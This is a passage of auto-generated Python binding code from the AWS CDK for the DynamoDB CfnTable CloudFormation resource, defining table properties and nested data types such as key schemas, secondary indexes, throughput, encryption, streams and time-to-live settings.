:param resource_attributes: -
:param finder: The finder interface used to resolve references across the template.
stability
:stability: experimental
"""
options = aws_cdk.core.FromCloudFormationOptions(finder=finder)
return jsii.sinvoke(
cls, "fromCloudFormation", [scope, id, resource_attributes, options]
)
@jsii.member(jsii_name="inspect")
def inspect(self, inspector: aws_cdk.core.TreeInspector) -> None:
"""Examines the CloudFormation resource and discloses attributes.
:param inspector: - tree inspector to collect and process attributes.
stability
:stability: experimental
"""
return jsii.invoke(self, "inspect", [inspector])
@jsii.member(jsii_name="renderProperties")
def _render_properties(
self, props: typing.Mapping[str, typing.Any]
) -> typing.Mapping[str, typing.Any]:
"""
:param props: -
"""
return jsii.invoke(self, "renderProperties", [props])
@jsii.python.classproperty
@jsii.member(jsii_name="CFN_RESOURCE_TYPE_NAME")
def CFN_RESOURCE_TYPE_NAME(cls) -> str:
"""The CloudFormation resource type name for this resource class."""
return jsii.sget(cls, "CFN_RESOURCE_TYPE_NAME")
@builtins.property
@jsii.member(jsii_name="attrArn")
def attr_arn(self) -> str:
"""
cloudformationAttribute:
:cloudformationAttribute:: Arn
"""
return jsii.get(self, "attrArn")
@builtins.property
@jsii.member(jsii_name="attrStreamArn")
def attr_stream_arn(self) -> str:
"""
cloudformationAttribute:
:cloudformationAttribute:: StreamArn
"""
return jsii.get(self, "attrStreamArn")
@builtins.property
@jsii.member(jsii_name="cfnProperties")
def _cfn_properties(self) -> typing.Mapping[str, typing.Any]:
return jsii.get(self, "cfnProperties")
@builtins.property
@jsii.member(jsii_name="tags")
def tags(self) -> aws_cdk.core.TagManager:
"""``AWS::DynamoDB::Table.Tags``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-dynamodb-table.html#cfn-dynamodb-table-tags
"""
return jsii.get(self, "tags")
@builtins.property
@jsii.member(jsii_name="keySchema")
def key_schema(
self,
) -> typing.Union[
aws_cdk.core.IResolvable,
typing.List[typing.Union["KeySchemaProperty", aws_cdk.core.IResolvable]],
]:
"""``AWS::DynamoDB::Table.KeySchema``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-dynamodb-table.html#cfn-dynamodb-table-keyschema
"""
return jsii.get(self, "keySchema")
@key_schema.setter
def key_schema(
self,
value: typing.Union[
aws_cdk.core.IResolvable,
typing.List[typing.Union["KeySchemaProperty", aws_cdk.core.IResolvable]],
],
) -> None:
jsii.set(self, "keySchema", value)
@builtins.property
@jsii.member(jsii_name="attributeDefinitions")
def attribute_definitions(
self,
) -> typing.Optional[
typing.Union[
aws_cdk.core.IResolvable,
typing.List[
typing.Union[aws_cdk.core.IResolvable, "AttributeDefinitionProperty"]
],
]
]:
"""``AWS::DynamoDB::Table.AttributeDefinitions``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-dynamodb-table.html#cfn-dynamodb-table-attributedef
"""
return jsii.get(self, "attributeDefinitions")
@attribute_definitions.setter
def attribute_definitions(
self,
value: typing.Optional[
typing.Union[
aws_cdk.core.IResolvable,
typing.List[
typing.Union[
aws_cdk.core.IResolvable, "AttributeDefinitionProperty"
]
],
]
],
) -> None:
jsii.set(self, "attributeDefinitions", value)
@builtins.property
@jsii.member(jsii_name="billingMode")
def billing_mode(self) -> typing.Optional[str]:
"""``AWS::DynamoDB::Table.BillingMode``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-dynamodb-table.html#cfn-dynamodb-table-billingmode
"""
return jsii.get(self, "billingMode")
@billing_mode.setter
def billing_mode(self, value: typing.Optional[str]) -> None:
jsii.set(self, "billingMode", value)
@builtins.property
@jsii.member(jsii_name="globalSecondaryIndexes")
def global_secondary_indexes(
self,
) -> typing.Optional[
typing.Union[
aws_cdk.core.IResolvable,
typing.List[
typing.Union[aws_cdk.core.IResolvable, "GlobalSecondaryIndexProperty"]
],
]
]:
"""``AWS::DynamoDB::Table.GlobalSecondaryIndexes``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-dynamodb-table.html#cfn-dynamodb-table-gsi
"""
return jsii.get(self, "globalSecondaryIndexes")
@global_secondary_indexes.setter
def global_secondary_indexes(
self,
value: typing.Optional[
typing.Union[
aws_cdk.core.IResolvable,
typing.List[
typing.Union[
aws_cdk.core.IResolvable, "GlobalSecondaryIndexProperty"
]
],
]
],
) -> None:
jsii.set(self, "globalSecondaryIndexes", value)
@builtins.property
@jsii.member(jsii_name="localSecondaryIndexes")
def local_secondary_indexes(
self,
) -> typing.Optional[
typing.Union[
aws_cdk.core.IResolvable,
typing.List[
typing.Union[aws_cdk.core.IResolvable, "LocalSecondaryIndexProperty"]
],
]
]:
"""``AWS::DynamoDB::Table.LocalSecondaryIndexes``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-dynamodb-table.html#cfn-dynamodb-table-lsi
"""
return jsii.get(self, "localSecondaryIndexes")
@local_secondary_indexes.setter
def local_secondary_indexes(
self,
value: typing.Optional[
typing.Union[
aws_cdk.core.IResolvable,
typing.List[
typing.Union[
aws_cdk.core.IResolvable, "LocalSecondaryIndexProperty"
]
],
]
],
) -> None:
jsii.set(self, "localSecondaryIndexes", value)
@builtins.property
@jsii.member(jsii_name="pointInTimeRecoverySpecification")
def point_in_time_recovery_specification(
self,
) -> typing.Optional[
typing.Union[
aws_cdk.core.IResolvable, "PointInTimeRecoverySpecificationProperty"
]
]:
"""``AWS::DynamoDB::Table.PointInTimeRecoverySpecification``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-dynamodb-table.html#cfn-dynamodb-table-pointintimerecoveryspecification
"""
return jsii.get(self, "pointInTimeRecoverySpecification")
@point_in_time_recovery_specification.setter
def point_in_time_recovery_specification(
self,
value: typing.Optional[
typing.Union[
aws_cdk.core.IResolvable, "PointInTimeRecoverySpecificationProperty"
]
],
) -> None:
jsii.set(self, "pointInTimeRecoverySpecification", value)
@builtins.property
@jsii.member(jsii_name="provisionedThroughput")
def provisioned_throughput(
self,
) -> typing.Optional[
typing.Union[aws_cdk.core.IResolvable, "ProvisionedThroughputProperty"]
]:
"""``AWS::DynamoDB::Table.ProvisionedThroughput``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-dynamodb-table.html#cfn-dynamodb-table-provisionedthroughput
"""
return jsii.get(self, "provisionedThroughput")
@provisioned_throughput.setter
def provisioned_throughput(
self,
value: typing.Optional[
typing.Union[aws_cdk.core.IResolvable, "ProvisionedThroughputProperty"]
],
) -> None:
jsii.set(self, "provisionedThroughput", value)
@builtins.property
@jsii.member(jsii_name="sseSpecification")
def sse_specification(
self,
) -> typing.Optional[
typing.Union[aws_cdk.core.IResolvable, "SSESpecificationProperty"]
]:
"""``AWS::DynamoDB::Table.SSESpecification``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-dynamodb-table.html#cfn-dynamodb-table-ssespecification
"""
return jsii.get(self, "sseSpecification")
@sse_specification.setter
def sse_specification(
self,
value: typing.Optional[
typing.Union[aws_cdk.core.IResolvable, "SSESpecificationProperty"]
],
) -> None:
jsii.set(self, "sseSpecification", value)
@builtins.property
@jsii.member(jsii_name="streamSpecification")
def stream_specification(
self,
) -> typing.Optional[
typing.Union[aws_cdk.core.IResolvable, "StreamSpecificationProperty"]
]:
"""``AWS::DynamoDB::Table.StreamSpecification``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-dynamodb-table.html#cfn-dynamodb-table-streamspecification
"""
return jsii.get(self, "streamSpecification")
@stream_specification.setter
def stream_specification(
self,
value: typing.Optional[
typing.Union[aws_cdk.core.IResolvable, "StreamSpecificationProperty"]
],
) -> None:
jsii.set(self, "streamSpecification", value)
@builtins.property
@jsii.member(jsii_name="tableName")
def table_name(self) -> typing.Optional[str]:
"""``AWS::DynamoDB::Table.TableName``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-dynamodb-table.html#cfn-dynamodb-table-tablename
"""
return jsii.get(self, "tableName")
@table_name.setter
def table_name(self, value: typing.Optional[str]) -> None:
jsii.set(self, "tableName", value)
@builtins.property
@jsii.member(jsii_name="timeToLiveSpecification")
def time_to_live_specification(
self,
) -> typing.Optional[
typing.Union[aws_cdk.core.IResolvable, "TimeToLiveSpecificationProperty"]
]:
"""``AWS::DynamoDB::Table.TimeToLiveSpecification``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-dynamodb-table.html#cfn-dynamodb-table-timetolivespecification
"""
return jsii.get(self, "timeToLiveSpecification")
@time_to_live_specification.setter
def time_to_live_specification(
self,
value: typing.Optional[
typing.Union[aws_cdk.core.IResolvable, "TimeToLiveSpecificationProperty"]
],
) -> None:
jsii.set(self, "timeToLiveSpecification", value)
@jsii.data_type(
jsii_type="@aws-cdk/aws-dynamodb.CfnTable.AttributeDefinitionProperty",
jsii_struct_bases=[],
name_mapping={
"attribute_name": "attributeName",
"attribute_type": "attributeType",
},
)
class AttributeDefinitionProperty:
def __init__(self, *, attribute_name: str, attribute_type: str) -> None:
"""
:param attribute_name: ``CfnTable.AttributeDefinitionProperty.AttributeName``.
:param attribute_type: ``CfnTable.AttributeDefinitionProperty.AttributeType``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-dynamodb-attributedef.html
"""
self._values = {
"attribute_name": attribute_name,
"attribute_type": attribute_type,
}
@builtins.property
def attribute_name(self) -> str:
"""``CfnTable.AttributeDefinitionProperty.AttributeName``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-dynamodb-attributedef.html#cfn-dynamodb-attributedef-attributename
"""
return self._values.get("attribute_name")
@builtins.property
def attribute_type(self) -> str:
"""``CfnTable.AttributeDefinitionProperty.AttributeType``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-dynamodb-attributedef.html#cfn-dynamodb-attributedef-attributename-attributetype
"""
return self._values.get("attribute_type")
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return "AttributeDefinitionProperty(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
@jsii.data_type(
jsii_type="@aws-cdk/aws-dynamodb.CfnTable.GlobalSecondaryIndexProperty",
jsii_struct_bases=[],
name_mapping={
"index_name": "indexName",
"key_schema": "keySchema",
"projection": "projection",
"provisioned_throughput": "provisionedThroughput",
},
)
class GlobalSecondaryIndexProperty:
def __init__(
self,
*,
index_name: str,
key_schema: typing.Union[
aws_cdk.core.IResolvable,
typing.List[
typing.Union["CfnTable.KeySchemaProperty", aws_cdk.core.IResolvable]
],
],
projection: typing.Union[
aws_cdk.core.IResolvable, "CfnTable.ProjectionProperty"
],
provisioned_throughput: typing.Optional[
typing.Union[
aws_cdk.core.IResolvable, "CfnTable.ProvisionedThroughputProperty"
]
] = None,
) -> None:
"""
:param index_name: ``CfnTable.GlobalSecondaryIndexProperty.IndexName``.
:param key_schema: ``CfnTable.GlobalSecondaryIndexProperty.KeySchema``.
:param projection: ``CfnTable.GlobalSecondaryIndexProperty.Projection``.
:param provisioned_throughput: ``CfnTable.GlobalSecondaryIndexProperty.ProvisionedThroughput``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-dynamodb-gsi.html
"""
self._values = {
"index_name": index_name,
"key_schema": key_schema,
"projection": projection,
}
if provisioned_throughput is not None:
self._values["provisioned_throughput"] = provisioned_throughput
@builtins.property
def index_name(self) -> str:
"""``CfnTable.GlobalSecondaryIndexProperty.IndexName``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-dynamodb-gsi.html#cfn-dynamodb-gsi-indexname
"""
return self._values.get("index_name")
@builtins.property
def key_schema(
self,
) -> typing.Union[
aws_cdk.core.IResolvable,
typing.List[
typing.Union["CfnTable.KeySchemaProperty", aws_cdk.core.IResolvable]
],
]:
"""``CfnTable.GlobalSecondaryIndexProperty.KeySchema``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-dynamodb-gsi.html#cfn-dynamodb-gsi-keyschema
"""
return self._values.get("key_schema")
@builtins.property
def projection(
self,
) -> typing.Union[aws_cdk.core.IResolvable, "CfnTable.ProjectionProperty"]:
"""``CfnTable.GlobalSecondaryIndexProperty.Projection``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-dynamodb-gsi.html#cfn-dynamodb-gsi-projection
"""
return self._values.get("projection")
@builtins.property
def provisioned_throughput(
self,
) -> typing.Optional[
typing.Union[
aws_cdk.core.IResolvable, "CfnTable.ProvisionedThroughputProperty"
]
]:
"""``CfnTable.GlobalSecondaryIndexProperty.ProvisionedThroughput``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-dynamodb-gsi.html#cfn-dynamodb-gsi-provisionedthroughput
"""
return self._values.get("provisioned_throughput")
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return "GlobalSecondaryIndexProperty(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
@jsii.data_type(
jsii_type="@aws-cdk/aws-dynamodb.CfnTable.KeySchemaProperty",
jsii_struct_bases=[],
name_mapping={"attribute_name": "attributeName", "key_type": "keyType"},
)
class KeySchemaProperty:
def __init__(self, *, attribute_name: str, key_type: str) -> None:
"""
:param attribute_name: ``CfnTable.KeySchemaProperty.AttributeName``.
:param key_type: ``CfnTable.KeySchemaProperty.KeyType``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-dynamodb-keyschema.html
"""
self._values = {
"attribute_name": attribute_name,
"key_type": key_type,
}
@builtins.property
def attribute_name(self) -> str:
"""``CfnTable.KeySchemaProperty.AttributeName``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-dynamodb-keyschema.html#aws-properties-dynamodb-keyschema-attributename
"""
return self._values.get("attribute_name")
@builtins.property
def key_type(self) -> str:
"""``CfnTable.KeySchemaProperty.KeyType``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-dynamodb-keyschema.html#aws-properties-dynamodb-keyschema-keytype
"""
return self._values.get("key_type")
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return "KeySchemaProperty(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
@jsii.data_type(
jsii_type="@aws-cdk/aws-dynamodb.CfnTable.LocalSecondaryIndexProperty",
jsii_struct_bases=[],
name_mapping={
"index_name": "indexName",
"key_schema": "keySchema",
"projection": "projection",
},
)
class LocalSecondaryIndexProperty:
def __init__(
self,
*,
index_name: str,
key_schema: typing.Union[
aws_cdk.core.IResolvable,
typing.List[
typing.Union["CfnTable.KeySchemaProperty", aws_cdk.core.IResolvable]
],
],
projection: typing.Union[
aws_cdk.core.IResolvable, "CfnTable.ProjectionProperty"
],
) -> None:
"""
:param index_name: ``CfnTable.LocalSecondaryIndexProperty.IndexName``.
:param key_schema: ``CfnTable.LocalSecondaryIndexProperty.KeySchema``.
:param projection: ``CfnTable.LocalSecondaryIndexProperty.Projection``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-dynamodb-lsi.html
"""
self._values = {
"index_name": index_name,
"key_schema": key_schema,
"projection": projection,
}
@builtins.property
def index_name(self) -> str:
"""``CfnTable.LocalSecondaryIndexProperty.IndexName``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-dynamodb-lsi.html#cfn-dynamodb-lsi-indexname
"""
return self._values.get("index_name")
@builtins.property
def key_schema(
self,
) -> typing.Union[
aws_cdk.core.IResolvable,
typing.List[
typing.Union["CfnTable.KeySchemaProperty", aws_cdk.core.IResolvable]
],
]:
"""``CfnTable.LocalSecondaryIndexProperty.KeySchema``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-dynamodb-lsi.html#cfn-dynamodb-lsi-keyschema
"""
return self._values.get("key_schema")
@builtins.property
def projection(
self,
) -> typing.Union[aws_cdk.core.IResolvable, "CfnTable.ProjectionProperty"]:
"""``CfnTable.LocalSecondaryIndexProperty.Projection``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-dynamodb-lsi.html#cfn-dynamodb-lsi-projection
"""
return self._values.get("projection")
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return "LocalSecondaryIndexProperty(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
@jsii.data_type(
jsii_type="@aws-cdk/aws-dynamodb.CfnTable.PointInTimeRecoverySpecificationProperty",
jsii_struct_bases=[],
name_mapping={"point_in_time_recovery_enabled": "pointInTimeRecoveryEnabled"},
)
class PointInTimeRecoverySpecificationProperty:
def __init__(
self,
*,
point_in_time_recovery_enabled: typing.Optional[
typing.Union[bool, aws_cdk.core.IResolvable]
] = None,
) -> None:
"""
:param point_in_time_recovery_enabled: ``CfnTable.PointInTimeRecoverySpecificationProperty.PointInTimeRecoveryEnabled``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-dynamodb-table-pointintimerecoveryspecification.html
"""
self._values = {}
if point_in_time_recovery_enabled is not None:
self._values[
"point_in_time_recovery_enabled"
] = point_in_time_recovery_enabled
@builtins.property
def point_in_time_recovery_enabled(
self,
) -> typing.Optional[typing.Union[bool, aws_cdk.core.IResolvable]]:
"""``CfnTable.PointInTimeRecoverySpecificationProperty.PointInTimeRecoveryEnabled``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-dynamodb-table-pointintimerecoveryspecification.html#cfn-dynamodb-table-pointintimerecoveryspecification-pointintimerecoveryenabled
"""
return self._values.get("point_in_time_recovery_enabled")
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return "PointInTimeRecoverySpecificationProperty(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
@jsii.data_type(
jsii_type="@aws-cdk/aws-dynamodb.CfnTable.ProjectionProperty",
jsii_struct_bases=[],
name_mapping={
"non_key_attributes": "nonKeyAttributes",
"projection_type": "projectionType",
},
)
class ProjectionProperty:
def __init__(
self,
*,
non_key_attributes: typing.Optional[typing.List[str]] = None,
projection_type: typing.Optional[str] = None,
) -> None:
"""
:param non_key_attributes: ``CfnTable.ProjectionProperty.NonKeyAttributes``.
:param projection_type: ``CfnTable.ProjectionProperty.ProjectionType``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-dynamodb-projectionobject.html
"""
self._values = {}
if non_key_attributes is not None:
self._values["non_key_attributes"] = non_key_attributes
if projection_type is not None:
self._values["projection_type"] = projection_type
@builtins.property
def non_key_attributes(self) -> typing.Optional[typing.List[str]]:
"""``CfnTable.ProjectionProperty.NonKeyAttributes``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-dynamodb-projectionobject.html#cfn-dynamodb-projectionobj-nonkeyatt
"""
return self._values.get("non_key_attributes")
@builtins.property
def projection_type(self) -> typing.Optional[str]:
"""``CfnTable.ProjectionProperty.ProjectionType``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-dynamodb-projectionobject.html#cfn-dynamodb-projectionobj-projtype
"""
return self._values.get("projection_type")
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return "ProjectionProperty(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
@jsii.data_type(
jsii_type="@aws-cdk/aws-dynamodb.CfnTable.ProvisionedThroughputProperty",
jsii_struct_bases=[],
name_mapping={
"read_capacity_units": "readCapacityUnits",
"write_capacity_units": "writeCapacityUnits",
},
)
class ProvisionedThroughputProperty:
def __init__(
self, *, read_capacity_units: jsii.Number, write_capacity_units: jsii.Number
) -> None:
"""
:param read_capacity_units: ``CfnTable.ProvisionedThroughputProperty.ReadCapacityUnits``.
:param write_capacity_units: ``CfnTable.ProvisionedThroughputProperty.WriteCapacityUnits``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-dynamodb-provisionedthroughput.html
"""
self._values = {
"read_capacity_units": read_capacity_units,
"write_capacity_units": write_capacity_units,
}
@builtins.property
def read_capacity_units(self) -> jsii.Number:
"""``CfnTable.ProvisionedThroughputProperty.ReadCapacityUnits``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-dynamodb-provisionedthroughput.html#cfn-dynamodb-provisionedthroughput-readcapacityunits
"""
return self._values.get("read_capacity_units")
@builtins.property
def write_capacity_units(self) -> jsii.Number:
"""``CfnTable.ProvisionedThroughputProperty.WriteCapacityUnits``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-dynamodb-provisionedthroughput.html#cfn-dynamodb-provisionedthroughput-writecapacityunits
"""
return self._values.get("write_capacity_units")
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return "ProvisionedThroughputProperty(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
@jsii.data_type(
jsii_type="@aws-cdk/aws-dynamodb.CfnTable.SSESpecificationProperty",
jsii_struct_bases=[],
name_mapping={
"sse_enabled": "sseEnabled",
"kms_master_key_id": "kmsMasterKeyId",
"sse_type": "sseType",
},
)
class SSESpecificationProperty:
def __init__(
self,
*,
sse_enabled: typing.Union[bool, aws_cdk.core.IResolvable],
kms_master_key_id: typing.Optional[str] = None,
sse_type: typing.Optional[str] = None,
) -> None:
"""
:param sse_enabled: ``CfnTable.SSESpecificationProperty.SSEEnabled``.
:param kms_master_key_id: ``CfnTable.SSESpecificationProperty.KMSMasterKeyId``.
:param sse_type: ``CfnTable.SSESpecificationProperty.SSEType``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-dynamodb-table-ssespecification.html
"""
self._values = {
"sse_enabled": sse_enabled,
}
if kms_master_key_id is not None:
self._values["kms_master_key_id"] = kms_master_key_id
if sse_type is not None:
self._values["sse_type"] = sse_type
@builtins.property
def sse_enabled(self) -> typing.Union[bool, aws_cdk.core.IResolvable]:
"""``CfnTable.SSESpecificationProperty.SSEEnabled``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-dynamodb-table-ssespecification.html#cfn-dynamodb-table-ssespecification-sseenabled
"""
return self._values.get("sse_enabled")
@builtins.property
def kms_master_key_id(self) -> typing.Optional[str]:
"""``CfnTable.SSESpecificationProperty.KMSMasterKeyId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-dynamodb-table-ssespecification.html#cfn-dynamodb-table-ssespecification-kmsmasterkeyid
"""
return self._values.get("kms_master_key_id")
@builtins.property
def sse_type(self) -> typing.Optional[str]:
"""``CfnTable.SSESpecificationProperty.SSEType``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-dynamodb-table-ssespecification.html#cfn-dynamodb-table-ssespecification-ssetype
"""
return self._values.get("sse_type")
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return "SSESpecificationProperty(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
@jsii.data_type(
jsii_type="@aws-cdk/aws-dynamodb.CfnTable.StreamSpecificationProperty",
jsii_struct_bases=[],
name_mapping={"stream_view_type": "streamViewType"},
)
class StreamSpecificationProperty:
def __init__(self, *, stream_view_type: str) -> None:
"""
:param stream_view_type: ``CfnTable.StreamSpecificationProperty.StreamViewType``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-dynamodb-streamspecification.html
"""
self._values = {
"stream_view_type": stream_view_type,
}
@builtins.property
def stream_view_type(self) -> str:
"""``CfnTable.StreamSpecificationProperty.StreamViewType``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-dynamodb-streamspecification.html#cfn-dynamodb-streamspecification-streamviewtype
"""
return self._values.get("stream_view_type")
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return "StreamSpecificationProperty(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
@jsii.data_type(
jsii_type="@aws-cdk/aws-dynamodb.CfnTable.TimeToLiveSpecificationProperty",
jsii_struct_bases=[],
name_mapping={"attribute_name": "attributeName", "enabled": "enabled"},
)
class TimeToLiveSpecificationProperty:
def __init__(
self,
*,
attribute_name: str,
enabled: typing.Union[bool, aws_cdk.core.IResolvable],
) -> None:
"""
:param attribute_name: ``CfnTable.TimeToLiveSpecificationProperty.AttributeName``.
:param enabled: ``CfnTable.TimeToLiveSpecificationProperty.Enabled``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-dynamodb-timetolivespecification.html
"""
self._values = {
"attribute_name": attribute_name,
"enabled": enabled,
}
@builtins.property
def attribute_name(self) -> str:
"""``CfnTable.TimeToLiveSpecificationProperty.AttributeName``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-dynamodb-timetolivespecification.html#cfn-dynamodb-timetolivespecification-attributename
"""
return self._values.get("attribute_name")
@builtins.property
def enabled(self) -> typing.Union[bool, aws_cdk.core.IResolvable]:
"""``CfnTable.TimeToLiveSpecificationProperty.Enabled``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-dynamodb-timetolivespecification.html#cfn-dynamodb-timetolivespecification-enabled
"""
return self._values.get("enabled")
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return "TimeToLiveSpecificationProperty(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
@jsii.data_type(
jsii_type="@aws-cdk/aws-dynamodb.CfnTableProps",
jsii_struct_bases=[],
name_mapping={
"key_schema": "keySchema",
"attribute_definitions": "attributeDefinitions",
"billing_mode": "billingMode",
"global_secondary_indexes": "globalSecondaryIndexes",
"local_secondary_indexes": "localSecondaryIndexes",
"point_in_time_recovery_specification": "pointInTimeRecoverySpecification",
"provisioned_throughput": "provisionedThroughput",
"sse_specification": "sseSpecification",
"stream_specification": "streamSpecification",
"table_name": "tableName",
"tags": "tags",
"time_to_live_specification": "timeToLiveSpecification",
},
)
class CfnTableProps:
def __init__(
self,
*,
key_schema: typing.Union[
aws_cdk.core.IResolvable,
typing.List[
typing.Union["CfnTable.KeySchemaProperty", aws_cdk.core.IResolvable]
],
],
attribute_definitions: typing.Optional[
typing.Union[
aws_cdk.core.IResolvable,
typing.List[
typing.Union[
aws_cdk.core.IResolvable, "CfnTable.AttributeDefinitionProperty"
]
],
]
] = None,
billing_mode: typing.Optional[str] = None,
global_secondary_indexes: typing.Optional[
typing.Union[
aws_cdk.core.IResolvable,
typing.List[
typing.Union[
aws_cdk.core.IResolvable,
"CfnTable.GlobalSecondaryIndexProperty",
]
],
]
] = None,
local_secondary_indexes: typing.Optional[
typing.Union[
aws_cdk.core.IResolvable,
typing.List[
typing.Union[
aws_cdk.core.IResolvable, "CfnTable.LocalSecondaryIndexProperty"
]
],
]
] = None,
point_in_time_recovery_specification: typing.Optional[
typing.Union[
aws_cdk.core.IResolvable,
"CfnTable.PointInTimeRecoverySpecificationProperty",
]
] = None,
provisioned_throughput: typing.Optional[
typing.Union[
aws_cdk.core.IResolvable, "CfnTable.ProvisionedThroughputProperty"
]
] = None,
sse_specification: typing.Optional[
typing.Union[aws_cdk.core.IResolvable, "CfnTable.SSESpecificationProperty"]
] = None,
stream_specification: typing.Optional[
typing.Union[
aws_cdk.core.IResolvable, "CfnTable.StreamSpecificationProperty"
]
] = None,
table_name: typing.Optional[str] = None,
tags: typing.Optional[typing.List[aws_cdk.core.CfnTag]] = None,
time_to_live_specification: typing.Optional[
typing.Union[
aws_cdk.core.IResolvable, "CfnTable.TimeToLiveSpecificationProperty"
]
] = None,
) -> None:
"""Properties for defining a ``AWS::DynamoDB::Table``.
:param key_schema: ``AWS::DynamoDB::Table.KeySchema``.
:param attribute_definitions: ``AWS::DynamoDB::Table.AttributeDefinitions``.
:param billing_mode: ``AWS::DynamoDB::Table.BillingMode``.
:param global_secondary_indexes: ``AWS::DynamoDB::Table.GlobalSecondaryIndexes``.
:param local_secondary_indexes: ``AWS::DynamoDB::Table.LocalSecondaryIndexes``.
